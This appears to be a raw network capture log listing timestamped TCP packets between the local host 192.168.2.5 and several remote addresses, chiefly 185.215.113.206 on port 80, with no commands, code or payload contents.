Nov 10, 2024 04:55:23.163677931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163698912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163710117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163713932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163727999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163739920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163752079 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163758039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163775921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163781881 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163794041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163806915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163811922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163844109 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163865089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163875103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163880110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163886070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163898945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163919926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163919926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163940907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163952112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163959026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.163963079 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163978100 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163990974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.163995028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164020061 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164036989 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164036989 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164077997 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164099932 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164112091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164122105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164134979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164149046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164151907 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164151907 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164180040 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164186001 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164206028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164206982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164218903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164246082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164246082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164257050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164268970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164278984 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164287090 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164287090 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164315939 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164345980 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164357901 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164386988 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164392948 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164398909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164410114 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164423943 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164431095 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164447069 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164464951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164465904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164484978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164495945 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164495945 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164509058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164535999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164539099 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164551973 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164566040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164572954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164577961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164611101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164625883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164632082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164632082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164649010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164659023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164669037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164683104 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164688110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164688110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164693117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164705992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164717913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164726973 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164726973 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164731979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164743900 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164756060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164757967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164781094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164789915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164802074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164802074 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164813995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164859056 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164859056 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164879084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164889097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164906979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164920092 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164936066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164947033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164959908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164973021 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164979935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164984941 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.164994955 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.164997101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165013075 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165019989 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165031910 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165045977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165064096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165075064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165079117 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165079117 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165091038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165107965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165111065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165111065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165136099 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165138960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165146112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165150881 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165160894 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165174007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165184975 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165198088 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165205002 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165218115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165222883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165229082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165244102 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165256023 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165256023 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165271997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165277958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165287971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165314913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165328979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165333033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165333033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165339947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165352106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165364027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165365934 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165374994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165388107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165400028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165400982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165411949 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165425062 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165432930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165432930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165452003 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165478945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165520906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165533066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165556908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165570021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165575027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165587902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165592909 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165601015 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165607929 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165663958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165663958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165673971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165685892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165695906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165709019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165726900 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165770054 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165770054 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165817022 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165859938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165868998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165882111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165915966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165915966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.165983915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.165993929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166004896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166018009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166024923 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166029930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166042089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166052103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166064024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166075945 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166075945 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166076899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166098118 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166110039 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166147947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166189909 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166215897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166230917 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166254044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166256905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166270018 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166290045 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166301966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166327000 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166357040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166366100 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166368008 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166405916 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166433096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166443110 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166450977 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166485071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.166697979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166707039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.166783094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.178061008 CET	49823	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.178105116 CET	443	49823	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.178160906 CET	49823	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.178370953 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.178858995 CET	49823	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.178874969 CET	443	49823	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.189570904 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.189599037 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.189817905 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.189830065 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:23.189836979 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.189841032 CET	49816	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.190296888 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.190303087 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.198920012 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.198930025 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.198945045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.198957920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.198970079 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.198983908 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.199038982 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.202409983 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.202426910 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.202506065 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.202512980 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.202554941 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.204616070 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.205698013 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.205705881 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.205725908 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.205734968 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.205746889 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.205754995 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.205761909 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.205786943 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.205812931 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.206892014 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.206898928 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.206919909 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.206935883 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.206955910 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.206960917 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.207000971 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.208687067 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.208693981 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.208719015 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.208745003 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.208750010 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.208755016 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.208770037 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.208796978 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.211339951 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.211350918 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.213028908 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.213032961 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.228967905 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.228984118 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.229026079 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.229031086 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.229072094 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.229506969 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.229557991 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.229558945 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.229624033 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.230678082 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.230685949 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.233833075 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.233844995 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.233867884 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.233879089 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.233886003 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.233927965 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.233932018 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.233974934 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.239244938 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239264011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239276886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239306927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239334106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239348888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239361048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239373922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239420891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239433050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239444017 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239464045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239470959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239470959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239470959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239471912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239471912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239471912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239480972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239517927 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239517927 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239545107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239597082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239610910 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239610910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239645958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239645958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239659071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239670038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239684105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239695072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239721060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239721060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239754915 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239764929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239775896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239788055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239800930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239809990 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239809990 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239814043 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239836931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239878893 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239892006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239897013 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239908934 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239922047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239924908 CET	49771	80	192.168.2.5	185.215.113.206
